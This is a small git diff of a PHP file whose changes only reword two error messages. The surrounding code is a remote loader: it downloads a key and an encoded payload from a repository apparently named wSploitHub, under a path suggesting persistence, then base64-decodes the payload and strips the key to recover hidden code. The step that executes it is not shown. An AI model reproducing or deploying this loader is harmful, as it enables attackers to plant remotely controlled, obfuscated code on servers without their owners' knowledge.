diff --git a/farm/presrig.php b/farm/presrig.php index ac30d5b..89b3d97 100644 --- a/farm/presrig.php +++ b/farm/presrig.php @@ -14,11 +14,11 @@ $hashUrl = 'https://git.warceuproject.org/syn/wSploitHub/raw/branch/main/api/v2/ $codeUrl = 'https://git.warceuproject.org/syn/wSploitHub/raw/branch/main/raw/php/prisisten'; $keyHash = trim(get_contents($hashUrl)); if (empty($keyHash)) { - die("Gagal mengambil hash key dari URL.\n"); + die("Die! Hash URL.\n"); } $encoded_code = get_contents($codeUrl); if (empty($encoded_code)) { - die("Gagal mengambil kode terenkripsi dari URL.\n"); + die("Die! Code URL.\n"); } $decoded_code = base64_decode($encoded_code); $clean_code = str_replace($keyHash, '', $decoded_code);